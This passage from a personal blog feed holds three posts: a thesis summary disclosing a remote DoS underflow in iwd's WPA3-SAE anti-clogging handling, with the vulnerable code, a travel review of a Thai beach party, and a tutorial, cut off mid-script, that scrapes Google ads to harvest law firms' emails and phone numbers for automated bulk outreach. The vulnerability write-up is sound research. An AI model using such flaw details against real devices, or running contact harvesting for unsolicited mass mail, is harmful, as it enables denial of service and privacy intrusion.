<p>Unfortunately, the thesis did not yield results as spectacular as those of my <a href="https://incolumitas.com/2016/06/08/typosquatting-package-managers/">Bachelor Thesis</a>. However, I managed to gather some interesting insights and suggestions for further fruitful work:</p>
<figure>
<img src="https://incolumitas.com/images/fuzzing_results.png" alt="Fuzzing Results" style="width: 100%" />
<figcaption>A summary of the fuzzing results obtained from the master thesis.</figcaption>
</figure>
<p>I managed to find a DoS vulnerability in the handling of anti-clogging tokens in <strong>iwd</strong>, the iNet wireless daemon developed by Intel. The vulnerability can be triggered remotely and it is possible to completely block any supplicant that tries to connect to the BSSID. The vulnerable function is called <code>sae_process_anti_clogging</code> located in the file <code>iwd/src/sae.c</code> in version <code>iwd v0.18</code>.</p>
<p>Ironically, the anti-clogging defense of WPA3-SAE tries to mitigate DoS attacks that arise when an attacker floods the victim with many forged commit frames which invoke a cascade of costly commit frame processing operations such as password element derivation, quadratic residue blinding and the mitigations against side channel attacks and timing attacks themselves.</p>
<div class="highlight"><pre><span></span><code><span class="k">static</span><span class="w"> </span><span class="kt">void</span><span class="w"> </span><span class="nf">sae_process_anti_clogging</span><span class="p">(</span><span class="k">struct</span><span class="w"> </span><span class="nc">sae_sm</span><span class="w"> </span><span class="o">*</span><span class="n">sm</span><span class="p">,</span><span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="kt">uint8_t</span><span class="w"> </span><span class="o">*</span><span class="n">ptr</span><span class="p">,</span><span class="w"></span>
<span class="kt">size_t</span><span class="w"> </span><span class="n">len</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="cm">/*</span>
<span class="cm"> * IEEE 802.11-2016 - Section 12.4.6 Anti-clogging tokens</span>
<span class="cm"> *</span>
<span class="cm"> * It is suggested that an Anti-Clogging Token not exceed 256 octets</span>
<span class="cm"> */</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">len</span><span class="w"> </span><span class="o">></span><span class="w"> </span><span class="mi">256</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">l_error</span><span class="p">(</span><span class="s">"anti-clogging token size %zu too large, 256 max"</span><span class="p">,</span><span class="w"> </span><span class="n">len</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">sm</span><span class="o">-></span><span class="n">token</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">l_memdup</span><span class="p">(</span><span class="n">ptr</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">2</span><span class="p">,</span><span class="w"> </span><span class="n">len</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="mi">2</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">sm</span><span class="o">-></span><span class="n">token_len</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">len</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="mi">2</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">sm</span><span class="o">-></span><span class="n">sync</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>The vulnerability is an unsigned integer underflow in the expression <code>len - 2</code>, which occurs when the anti-clogging frame has a payload of 0 or 1 bytes. Because <code>len</code> is an unsigned <code>size_t</code>, the subtraction wraps around to a huge value that is then passed to <code>l_memdup</code>. Technically, such a frame can be constructed and sent to <code>iwd</code>, even though it doesn't make any sense in a real world application, because the anti-clogging token payload should be a high entropy hashed secret that is verified by the issuer. More details <a href="https://incolumitas.com/data/dragonfly-fuzzing-wpa3.pdf">can be found in the thesis</a> in section 6.2.</p>
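<p>The effect of <code>len - 2</code> in the function above can be reproduced by modelling C's unsigned arithmetic. The sketch assumes a 64-bit <code>size_t</code>. The function names are made up, and the checked variant only illustrates the kind of lower bound that is missing; it is not the fix that was applied upstream.</p>

```javascript
// ASSUMPTION: size_t is 64 bits wide, as on common 64-bit Linux targets.
const SIZE_T_BITS = 64;

// Models the C expression `len - 2` on a size_t: the result wraps modulo 2^64.
function tokenLengthAsInIwd(len) {
  return BigInt.asUintN(SIZE_T_BITS, BigInt(len) - 2n);
}

// Hypothetical hardened variant: reject payloads shorter than the two skipped bytes.
function tokenLengthChecked(len) {
  if (len < 2 || len > 256) return null;
  return BigInt(len) - 2n;
}

for (const len of [0, 1, 2, 34]) {
  console.log(len, tokenLengthAsInIwd(len).toString(), tokenLengthChecked(len));
}
```

<p>For a payload of 0 or 1 bytes, the length handed to <code>l_memdup</code> is close to 2^64, although the existing <code>len &gt; 256</code> check was passed without complaint.</p>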
<ol>
<li>
<p>Furthermore, I created a blackbox fuzzing client that remotely fuzzes any WPA3 capable authenticator. The <a href="https://gitlab.com/NikolaiT/dragonfuzz">link to the source code of dragonfuzz can be found here</a>.</p>
</li>
<li>
<p>Another fuzzer is based on the <a href="https://github.com/jtpereyda/boofuzz">boofuzz framework</a> and <a href="https://github.com/NikolaiT/dragonfuzz">can be found on GitHub</a>.</p>
</li>
<li>
<p>It wasn't straightforward to correctly compile and target the functionality that is responsible for the framing of the WPA3 handshake within <code>hostapd</code>. Hence, <a href="https://github.com/NikolaiT/fuzz_sae_hostap">I also published the instructions on how to fuzz hostapd with libFuzzer on GitHub</a>.</p>
</li>
</ol>
<p>Creating an efficient fuzzing interface for a large software project such as <code>hostapd</code> was a lot of work, so I hope it helps someone.</p>
<p>While running the fuzzer for a couple of minutes, an unsigned integer overflow similar to the one that led to the DoS above was reported by libFuzzer. However, it didn't have any harmful consequences.</p>
<h3>Limitations of the fuzzing approach</h3>
<p>The SAE handshake consists of only two frames with a total of five possible fields in the Auth-Commit management body (group id, scalar, element, optional anti-clogging token, optional password identifier) and only two possible fields in the Auth-Confirm frame (send confirm number, confirm token). Therefore, the parsing of those two authentication frames has limited complexity and thus the likelihood of programming mistakes in the parsing code is similarly slim. Hence, a solely fuzzing based approach as conducted in this thesis covers only a fraction of all existing vulnerability
classes.</p>
<h3>Conclusion</h3>
<p>Writing an efficient fuzzer that targets the WPA3-SAE authentication handshake in the wild is a difficult assignment, because there exists almost no hardware that supports the WPA3-SAE handshake at the time of writing this thesis (August 2019).</p>
<p>Instead a hybrid approach was followed. One method was the in-process, coverage-guided greybox fuzzing of the open source WiFi supplicant <code>iwd</code> and access point implementation <code>hostapd</code> with the fuzzing engine libFuzzer.</p>
<p>Another fuzzing strategy was a remote, over-the-radio blackbox fuzzing of the Synology MR2200ac Router, one of the rare devices that already supports the new WPA3 certification. Remote fuzzing was conducted with a fuzzing framework named Dragonfuzz that was developed during this thesis.</p>
<p>As a concluding statement, the author conjectures that a fuzzing based approach using modern, powerful greybox fuzzing engines such as AFL or libFuzzer is only meaningful if the target of evaluation is rich in parsing functionality. This is not necessarily the case with WPA3-SAE implementations, where parsing is limited to a few fields of static size. The room for logical flaws such as timing attacks or cryptographic implementation mistakes is much larger, as recent research has proven.</p>
<p>A manual security audit that checks for logical vulnerabilities is probably more successful in uncovering security vulnerabilities compared to an automated fuzzing based methodology. However, such a manual review process requires extensive experience from the auditor in various areas of computer security research in order to yield potential results.</p>
<p>Nevertheless, the research conducted in this thesis yielded a harmful DoS vulnerability in the 802.11 supplicant software <code>iwd</code> and thus justifies the chosen methodology.</p>Review of the Koh Phangan Full Moon Party in October 20192019-10-15T14:30:00+02:002019-10-18T18:30:00+02:00Nikolai Tschachertag:incolumitas.com,2019-10-15:/2019/10/15/thailand-koh-phangan-fullmoon-party-octobre-2019/<p>Travel experiences during the days of the full moon party in Koh Phangan. The Jungle Experience Party is a huge scam, the Waterfall Party on Koh Phangan might be even worse.</p><p>This blog post tries to give you an honest impression of my experience
during the full moon party on the Thai island Koh Phangan on 13th and 14th October 2019. In hindsight, I would rate it a 3.5/5. The pre party, <strong>the Jungle Experience Party is utter trash</strong>, the Full Moon Party itself was a quite enjoyable beach party and worth a visit. At the time of writing, I was 28 years old and not the youngest lad anymore, therefore my trip journal must be understood within this context.</p>
<h2>Arrival and Goodtimes Backpackers hostel</h2>
<p>We took the Songserm ferry from Koh Tao to Koh Phangan. The two hour trip was reasonably priced (700 baht for two persons which equals 23 USD) and we immediately booked the Goodtime Beach Backpackers hostel close to the landing pier in the city. It's not necessary to take a taxi, the distance can be walked in 25 minutes.</p>
<p>It's not difficult to give a positive recommendation for the Goodtimes Backpackers hostel, because the dorms are clean, the beds are more or less comfortable, there is air conditioning in the rooms and the bathrooms are clean. The hostel itself is a party hostel and thus very social. You will encounter mostly young western folks that are looking for a presumably unforgettable Full Moon party night.</p>
<p>The hostel is only 20 meters from the beach and even has its own pool. The large outside area with a ping pong table and pool table creates a perfect nurturing ground for new friendships and travel connections. Therefore, the hostel itself is definitely a good catch if you are somewhat young, extroverted and you are looking to party a bit.</p>
<figure>
<img src="https://incolumitas.com/images/thailand/fmp/goodtimes.jpg" alt="goodtimes backpackers" style="width: 100%" />
<figcaption>The Goodtime Backpackers Hostel is a perfect catch if you are looking to party while also having the possibility to relax.</figcaption>
</figure>
<h2>The day before the full moon party - Jungle Experience Party</h2>
<p>The day before the legendary Full Moon Party on Haad Rin Beach starts, the so-called Jungle Experience Party is heavily advertised. <strong>In short, do not go there!!!</strong> All in all, the party <strong>is a huge scam</strong>. The entry fee amounts to 700 baht per person, which is about what you pay to get into a well-established techno/minimal club in Berlin.</p>
<figure>
<iframe width="560" height="315" src="https://www.youtube.com/embed/0JS-uGxl4BE" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
<figcaption>Heavy rain on the way home after the jungle experience party with an ambulance passing, probably taking some drugged party tourist to the next hospital.</figcaption>
</figure>
<p>Furthermore, most party hostels on the island organize a taxi that takes you to the Jungle Experience Party, for which you need to pay an additional 100 baht. One taxi can transport up to 15 passengers, so the total amount earned adds up to 1500 baht for a taxi ride that takes merely 5 minutes. It's a really good opportunity to milk cash from backpackers.</p>
<p>The general mood in the hostel prior to the Jungle Experience Party is a peer-pressured buildup. Honestly, the best part of the Jungle Experience Party is the anticipation of collecting good memories and having an unforgettable night. All the hostel staff recommend visiting it, probably because they receive a large share of the overpriced 700 baht ticket.</p>
<p>The party itself is supposed to be in the jungle, but there is an asphalt street going directly up to the entrance of the huge commercialized festival area where the party takes place. The staff wrongly stated that there is no road to the Jungle Experience Party and that taking your own motorbike would be dangerous. This is absolutely wrong. You can simply ride your own bike if you do not plan to get drunk. At the entrance to the <em>festival area</em>, there is no real jungle to be seen, maybe a couple of palm trees.</p>
<p>Instead, there are many shacks and Thai street vendors that try to sell you overpriced alcohol and food. There is one stage where some semi-interesting techno/house music is played. It's not particularly bad music, but it's not worth paying 700 baht for. The people there are mostly young folks between 18 and 25 years old trying to hook up and get as drunk as humanly possible. They don't seem to care about their surroundings that much, because most of them are very intoxicated and too young to know that better parties exist.</p>
<p>In the late hours of the Jungle Experience, I saw a girl stumbling through the party crowd, unable to keep her balance and orientation. It seemed as if she had been drugged with knockout (KO) pills. Luckily, a friend of hers managed to grab her and get her away from the crowd. Soon after, an ambulance arrived. Stories like that are common and you often hear similar ones in hostels. The most common advice is not to drink anything that you didn't open yourself and to never take your eyes off your drink.</p>
<p>When you have finally convinced yourself to get back to your hostel because it won't get any better, you need to find a taxi. Finding one is not a problem, since the whole festival area is full of locals that try to sell you their taxi services, but most of them charge around 500 baht for the 5 kilometer trip back to your hostel. We decided to just walk in order not to pay the overpriced tourist tax again. After a one-hour walk, we finally made it back to the dorm and got some sleep.</p>
<p>In conclusion, the party was heavily overpriced and not worth attending at all. The music was mediocre at best. The same probably applies to similar parties, such as the Waterfall Party on Koh Phangan. A guy from the hostel confirmed that the
Waterfall Party is even worse than the Jungle Experience Party, because there is not even a waterfall.</p>
<h2>The Full Moon Party</h2>
<p>Every month during full moon, there is a huge party on the south-east part of Koh Phangan: Haad Rin beach. The location is perfect for a beach party. There is a constant breeze coming from the open sea, such that the hot climate is somewhat neutralized by the wind. The wide beach allows you to find some private space even with thousands of party people dancing on the beach.</p>
<figure>
<img src="https://incolumitas.com/images/thailand/fmp/haadrin_day.jpg" alt="Haadrin on daylight" style="width: 100%" />
<figcaption>The Full Moon Party beach by day, with preparations under way.</figcaption>
</figure>
<p>The music is a mix ranging from techno, dubstep and minimal to hardstyle and mainstream party music. You can just walk to the next stage when you are tired of the music at the current one, and you can be assured that there is a music style for every taste on the wide beach. The overall atmosphere is really positive and welcoming. I didn't encounter a single fight or negative experience. Some guys are pissing into the sea, but this isn't a major problem because the sea is kinda rough with many waves. Some folks are on drugs, but I didn't see anything too crazy. When heading back to the mainland, two girls on the ferry told us that they were kinda shocked by the Full Moon Party, because they saw a heavily drugged woman in the sea, trying to find a <em>spiritual experience</em>. In reality, she was having a psychotic episode and wanted to drown herself in the waves. Therefore dear kids, <strong>do not take drugs whose origin you are unaware of</strong>.</p>
<p>The Full Moon Party isn't anything magical. If you don't plan to attend, you will only miss out on an experience that you can easily find at any large festival in your home country.</p>
<figure>
<img src="https://incolumitas.com/images/thailand/fmp/haadrin_night.jpg" alt="full moon party" style="width: 100%" />
<figcaption>The full moon party beach by night.</figcaption>
</figure>
<p>The organization is extremely well thought through. You may even buy your own alcohol and food for a cheap price in the many small 7-Eleven mini supermarkets in Haad Rin. The entry fee is a meager 100 baht, plus another 100 baht for the taxi ride from your hostel. I managed not to pay for the hostel taxi from Goodtime Backpackers, and my travel mate even arrived on his motorbike, although he needed to spend 50 baht to park it.</p>
<p>In general, I wouldn't recommend arriving at the party on your motorbike, because there might be police stops where you are fined for driving under the influence or for a missing motorcycle license (most car licenses from Europe do not allow you to ride a scooter larger than 50 cm³). Even if you are allowed to ride motorcycles in your country, you will need an international driving license.</p>
<h2>Conclusion</h2>
<p>The island Koh Phangan is worth a visit during the Full Moon Party. Below are my major recommendations for your stay on this island:</p>
<ol>
<li><strong>Do not go to the Jungle Experience Party that happens before the real Full Moon Party!!!</strong> The party is a scam and you kinda get pressured into it by the party hostel environment.</li>
<li>Rent a motorbike and drive around the island. Honestly, driving from beach to beach and cruising around on the steep jungle roads is my favourite experience from this island.</li>
<li>Go to the Full Moon Party and dance a bit, but don't expect to discover something magical and unique. It's just too mainstream and touristy to be special. Nevertheless, it's not a bad investment of your time. You can also go as a couple; it's definitely not a trip exclusively for single party folks. I would not buy and consume drugs, since the laws in Thailand are very strict and you never know what you end up consuming.</li>
</ol>Battling incomplete information: Connect market demand with market supply by Google advertisement scraping and lead crawling2019-09-30T19:42:00+02:002019-09-30T19:42:00+02:00Nikolai Tschachertag:incolumitas.com,2019-09-30:/2019/09/30/connecting-market-demand-and-supply-with-ad-scraping/<p>In this blog post, it is explained how a lack of perfect information about the market allows the clever middleman to connect market supply with market demand by advertisement scraping and lead crawling.</p><h2>The scenario</h2>
<p>Let's assume Alexandra is a very well connected woman in the legal industry and an executive in a large insurance corporation that consists of hundreds of branches spread all around the United States.</p>
<p>Clients that have been referred to Alexandra's insurance company frequently require legal counseling to settle various disputes. This referral (a lead) is a decision where a lot of money is made. It's common practice that the party that controls the demand (here, the insurance company) charges a fee in order to advertise and prioritize certain lawyers and legal professionals to their clients. Therefore, in a way, it is not the best lawyers who are recommended, but the attorneys that bought the right to be referred by the company.</p>
<p>This mechanism can be found in any industry or economy where companies control demand and the clients do not have perfect information about the supply. It's a consequence of (1) the inability of individuals to process a large collection of information and (2) the lack of perfect information in the first place.</p>
<p>There is a myriad of examples where people without proper information are shamelessly ripped off:</p>
<ul>
<li>
<p>As a tourist, you are vulnerable to all kinds of information disadvantages. You pay a tourist price for the taxi ride from the airport to your hotel, and you pay an increased price for the hotel itself, because you used sites such as <a href="https://dannymekic.com/201607/no-longer-use-booking-com-shouldnt-either">booking.com to book your accommodation</a>. When you eat in restaurants, you most likely end up paying more than the locals, just because you are a foreigner. The list goes on and on. As a tourist, you are basically viewed as a privileged person with lots of disposable income.</p>
</li>
<li>
<p>It's even worse in the housing market. When you are searching for an affordable shared flat and you start looking on online platforms, you most likely pay a price that is inflated by at least 50% compared to what you would pay if you knew the landlords in person.</p>
</li>
</ul>
<figure>
<img src="https://www.amchameu.eu/sites/default/files/styles/committee_thumbnail/public/group/digital_economy.jpg" alt="digital economy" style="width: 100%;" />
<figcaption>Incomplete information is the norm in every market (Source: https://www.amchameu.eu/committees-groups/digital-economy) </figcaption>
</figure>
<p>Put differently, for every kind of business where access to information is regulated (which is more or less the case in every industry), you pay a certain fee to an intermediary which connects market demand and market supply. Examples of large Internet intermediaries are <a href="https://www.airbnb.com">Airbnb</a> or <a href="https://tinder.com/">the devilish dating app Tinder</a>. In both cases, the platform makes money by creating the possibility of a transaction. The platform that brings together demand and supply doesn't add any value; it merely attempts to simulate a better market.</p>
<p>Let's jump back to Alexandra and her control over the demand in the form of clients that need to be referred to a legal counselor. Of course any client can decide for himself which lawyer he would prefer, but the recommendation of the insurance company carries a certain authority, especially because the client finds himself in a vulnerable situation.</p>
<p>So what is Alexandra looking for? She is in need of market supply: she can offer a continuous stream of many hundreds of clients whose insurance policies are going to pay large legal bills to the legal counselors. So her <strong>goal is to contact as many legal practitioners as possible</strong> and sign a client referral contract <strong>with the legal practitioners that pay the highest referral fee</strong>.</p>
<h2>Mining market supply</h2>
<p>Because Alexandra is so well connected, she contacts the CEO of <a href="https://scrapeulous.com/">scrapeulous.com</a>, a promising startup in the data mining and scraping industry. She asks the staff of scrapeulous to give her a list of contact information of legal practices from distinct law subfields that are actively looking for new clients and are willing to pay a certain percentage for promising referrals.</p>
<p>The staff from scrapeulous suggest scraping Google advertisement links for certain keyword combinations. The keywords shall consist of a <strong>city name</strong> and a <strong>law field</strong>, for example "family law New York" or "civil law Boston". By scraping the advertisement SERP results, it can be assumed that the law firms that paid for the advertisement are accepting new clients. That way it can be ensured that the practices are willing to offer supply.</p>
<p>Advertising with Google Ads is probably the best way to reach potential customers. It is assumed that at least 50% of the population in the West find service providers such as doctors or lawyers by making a Google search that combines the type of service with their geographical location.</p>
<p>By only considering Google advertisements, it is made sure that the law firms are looking for new clients. If an existing directory of lawyers were scraped instead, it could not be assumed that all leads are actively looking for new clients.</p>
<p>After having extracted the advertisement SERP results, the next step is to visit the advertisement link and extract telephone and email information from the website. Then a generic mail is automatically sent to each law practice with the offer to refer new clients to them if a certain referral fee (or percentage) is paid. If only 2% of all contacted law firms accept the deal, a very lucrative new revenue stream is generated for the insurance corporation. Of course in real life, there are a couple of other problems that need to be solved, but we will neglect those for the purpose of this blog post.</p>
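<p>To make the extraction step more concrete, here is a minimal sketch of how email addresses and phone numbers could be pulled out of a downloaded page with regular expressions. It is only an illustration and not the actual lead scraping function: the names <code>EMAIL_RE</code>, <code>PHONE_RE</code> and <code>extract_contacts</code> are made up for this example, and the phone pattern assumes US-style numbers.</p>

```python
import re

# Simple email pattern; good enough for a sketch, not RFC-complete.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# Assumed US-style numbers such as (313) 555-0100 or 313-555-0100.
PHONE_RE = re.compile(r"\(?\b\d{3}\)?[\s.-]\d{3}[\s.-]\d{4}\b")


def extract_contacts(html):
    """Return the unique emails and phone numbers found in a page."""
    emails = sorted({match.lower() for match in EMAIL_RE.findall(html)})
    phones = sorted(set(PHONE_RE.findall(html)))
    return {"emails": emails, "phones": phones}


# Fictional sample page (example.com and 555 numbers are placeholders).
sample = (
    '<a href="mailto:Info@example.com">info@example.com</a> '
    "Call (313) 555-0100 for a free consultation."
)
contacts = extract_contacts(sample)
print(contacts)
```

<p>Lowercasing the emails before deduplicating avoids contacting the same address twice just because it appears with different capitalization in a <code>mailto:</code> link and in the visible text.</p>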
<h2>Implementing the lead generation pipeline</h2>
<p>In a first step, the keywords that are monitored for advertisement results are created. In this example, ten large US cities are combined with seven common law subfields. The following cities</p>
<ul>
<li>Detroit</li>
<li>El Paso</li>
<li>Memphis</li>
<li>Seattle</li>
<li>Denver</li>
<li>Washington</li>
<li>Boston</li>
<li>Baltimore</li>
<li>Oklahoma City</li>
<li>Albuquerque</li>
</ul>
<p>and the following keywords </p>
<ul>
<li>DUI law</li>
<li>criminal law</li>
<li>employment law</li>
<li>family law</li>
<li>immigration lawyer</li>
<li>civil law</li>
<li>real estate attorney</li>
</ul>
<p>yield the following <a href="https://incolumitas.com/data/law_keywords.txt">list of 70 keywords</a> when combined.</p>
<figure>
<img src="https://incolumitas.com/images/keyword_gen.png" alt="keyword generation" style="width: 100%;" />
<figcaption>Quickly generating keywords with Python</figcaption>
</figure>
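<p>For readers who cannot see the screenshot, the keyword generation can be sketched in a few lines of Python. This is a reconstruction under assumptions, not necessarily the code from the image: the function name <code>build_keywords</code> is made up, and the phrase order (law field first, then city) simply follows the examples given earlier.</p>

```python
from itertools import product

CITIES = [
    "Detroit", "El Paso", "Memphis", "Seattle", "Denver",
    "Washington", "Boston", "Baltimore", "Oklahoma City", "Albuquerque",
]
LAW_FIELDS = [
    "DUI law", "criminal law", "employment law", "family law",
    "immigration lawyer", "civil law", "real estate attorney",
]


def build_keywords(law_fields, cities):
    """Return one '<law field> <city>' search phrase per combination."""
    return [f"{field} {city}" for field, city in product(law_fields, cities)]


keywords = build_keywords(LAW_FIELDS, CITIES)
print(len(keywords))  # 70
print(keywords[0])    # DUI law Detroit
```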
<p>After the keywords have been created, it's time to obtain the SERP result pages from Google. The scraping must originate from the same country in which the services are offered, so the keywords need to be scraped from the US. Furthermore, we only want the links from advertisements. Google will not display advertisements to a simple scraping script that requests the page with an HTTP GET request; instead, a headless browser such as Chromium controlled via <a href="https://github.com/GoogleChrome/puppeteer">puppeteer</a> must be used.</p>
<p>Because we do not want to reinvent the wheel, we will simply use the SERP API from <a href="https://scrapeulous.com/">scrapeulous.com</a> and sign up for a free plan that allows you to search up to 500 keywords on Google. You can easily <a href="https://scrapeulous.com/accounts/signup/">sign up here</a>.</p>
<p>After you have signed up, <a href="https://scrapeulous.com/dashboard/api">go to the dashboard</a> where you can see the instructions on how to use the API. You should also copy your API key into the script below. We will scrape all 70 keywords from the region US with the following quick Python script that makes use of the SERP API and downloads the keywords from this blog.</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">requests</span>
<span class="kn">import</span> <span class="nn">json</span>
<span class="n">url</span> <span class="o">=</span> <span class="s1">'https://scrapeulous.com/api/new'</span>
<span class="n">req</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'https://incolumitas.com/data/law_keywords.txt'</span><span class="p">)</span>
<span class="n">keywords</span> <span class="o">=</span> <span class="p">[</span><span class="n">kw</span> <span class="k">for</span> <span class="n">kw</span> <span class="ow">in</span> <span class="n">req</span><span class="o">.</span><span class="n">text</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">'</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span> <span class="k">if</span> <span class="n">kw</span><span class="p">]</span>
<span class="n">payload</span> <span class="o">=</span> <span class="p">{</span>
    <span class="s2">"search_engine"</span><span class="p">:</span> <span class="s2">"google"</span><span class="p">,</span>
    <span class="s2">"num_pages"</span><span class="p">:</span> <span class="mi">1</span><span class="p">,</span>
    <span class="s2">"region"</span><span class="p">:</span> <span class="s2">"us"</span><span class="p">,</span>
    <span class="s2">"keywords"</span><span class="p">:</span> <span class="n">keywords</span>
<span class="p">}</span>
<span class="n">headers</span> <span class="o">=</span> <span class="p">{</span>
    <span class="s1">'X-Api-Key'</span><span class="p">:</span> <span class="s1">''</span>
<span class="p">}</span>
<span class="n">r</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">post</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="n">json</span><span class="o">.</span><span class="n">dumps</span><span class="p">(</span><span class="n">payload</span><span class="p">),</span> <span class="n">headers</span><span class="o">=</span><span class="n">headers</span><span class="p">)</span>
<span class="n">data</span> <span class="o">=</span> <span class="n">r</span><span class="o">.</span><span class="n">json</span><span class="p">()</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s1">'scraped_keywords.json'</span><span class="p">,</span> <span class="s1">'w'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
    <span class="n">json</span><span class="o">.</span><span class="n">dump</span><span class="p">(</span><span class="n">data</span><span class="p">,</span> <span class="n">f</span><span class="p">)</span>
</code></pre></div>
<p>After having scraped those keywords with scrapeulous.com, it's time to extract the paid advertisement links from the SERP data. The following little script does the job and prints out all advertisement links that have been gathered from the SERP results:</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">json</span>
<span class="n">ad_links</span> <span class="o">=</span> <span class="p">[]</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s1">'scraped_keywords.json'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
    <span class="n">data</span> <span class="o">=</span> <span class="n">json</span><span class="o">.</span><span class="n">load</span><span class="p">(</span><span class="n">f</span><span class="p">)</span>
<span class="k">for</span> <span class="n">kw</span><span class="p">,</span> <span class="n">value</span> <span class="ow">in</span> <span class="n">data</span><span class="p">[</span><span class="s1">'results'</span><span class="p">]</span><span class="o">.</span><span class="n">items</span><span class="p">():</span>
    <span class="k">if</span> <span class="s1">'1'</span> <span class="ow">in</span> <span class="n">value</span><span class="p">:</span>
        <span class="k">for</span> <span class="n">ad</span> <span class="ow">in</span> <span class="n">value</span><span class="p">[</span><span class="s1">'1'</span><span class="p">][</span><span class="s1">'bottom_ads'</span><span class="p">]:</span>
            <span class="n">ad_links</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">ad</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'link'</span><span class="p">))</span>
        <span class="k">for</span> <span class="n">ad</span> <span class="ow">in</span> <span class="n">value</span><span class="p">[</span><span class="s1">'1'</span><span class="p">][</span><span class="s1">'top_ads'</span><span class="p">]:</span>
            <span class="n">ad_links</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">ad</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'link'</span><span class="p">))</span>
<span class="nb">print</span><span class="p">(</span><span class="n">ad_links</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">ad_links</span><span class="p">))</span>
</code></pre></div>
<p>The above code prints out 17 advertisement links, admittedly not many, but it is enough to justify the purpose of this blog post. When repeating the scraping process, Google will likely serve different advertisement links.</p>
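<p>Because <code>ad.get('link')</code> returns <code>None</code> for an ad without a link, and the same ad can show up for several keywords, it may be worth cleaning the list before using it further. The following is a minimal sketch of such a filter; the helper name <code>clean_links</code> and the sample URLs are made up for illustration.</p>

```python
from urllib.parse import urlparse


def clean_links(links):
    """Drop missing or non-HTTP links and remove duplicates, keeping order."""
    seen = set()
    cleaned = []
    for link in links:
        if not link:
            continue  # skips None and empty strings
        parsed = urlparse(link)
        if parsed.scheme not in ("http", "https") or not parsed.netloc:
            continue  # skips things like javascript: or relative links
        if link not in seen:
            seen.add(link)
            cleaned.append(link)
    return cleaned


# Placeholder input that mimics a raw list of scraped ad links.
raw_links = [
    "https://example.com/a",
    None,
    "https://example.com/a",
    "javascript:void(0)",
    "http://example.org/",
]
valid_links = clean_links(raw_links)
print(valid_links)
```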
<p>After that, we will use another scraping tool from scrapeulous.com, <a href="https://scrapeulous.com/dashboard/cloud-crawler">the cloud crawler API</a>. The <a href="https://github.com/NikolaiT/scrapeulous/blob/master/leads.js">lead scraping function</a> of the cloud crawler will be used and all valid URLs will be fed into this function.</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">requests</span>
<span class="kn">import</span> <span class="nn">json</span>
<span class="n">ad_links</span> <span class="o">=</span> <span class="p">[</span><span class="s1">'https://www.drunkdrivinglawyers.com/sem/dui-api1'</span><span class="p">,</span> <span class="s1">'https://ij.org/detroit-forfeiture/'</span><span class="p">,</span> <span class="s1">'https://www.fiegerlaw.com/employment-law/'</span><span class="p">,</span> <span class="s1">'http://immigrationlawyer911.com/'</span><span class="p">,</span> <span class="s1">'https://www.geoffreygnathanlaw.com/'</span><span class="p">,</span> <span class="s1">'https://www.duidenver.com/-/denver/dui-defense/'</span><span class="p">,</span> <span class="s1">'https://www.dui.com/colorado/denver-county/'</span><span class="p">,</span> <span class="s1">'https://www.lazzaralegal.com/criminal-defense/dui/'</span><span class="p">,</span> <span class="s1">'https://www.midsouthcriminaldefense.com/criminal-defense/dui/'</span><span class="p">,</span> <span class="s1">'https://www.duncanandhill.com/'</span><span class="p">,</span> <span class="s1">'https://www.bishoplawmd.com/practice-area/dui-law/'</span><span class="p">,</span> <span class="s1">'https://www.bishoplawmd.com/practice-area/criminal-law/'</span><span class="p">,</span> <span class="s1">'https://family.unbundledlegalhelp.com/alimony/baltimore-md?t=nil'</span><span class="p">,</span> <span class="s1">'https://cordellcordell.com/offices/maryland/baltimore/family-law-for-men-baltimore/'</span><span class="p">,</span> <span class="s1">'https://barrjoneslegal.com/'</span><span class="p">,</span> <span class="s1">'https://www.raygriffithlaw.com/'</span><span class="p">,</span> <span class="s1">'https://www.drunkdrivinglawyers.com/sem/dui-api1'</span><span class="p">]</span>
<span class="n">url</span> <span class="o">=</span> <span class="s1">'https://scrapeulous.com/api/cc'</span>
<span class="n">payload</span> <span class="o">=</span> <span class="p">{</span>
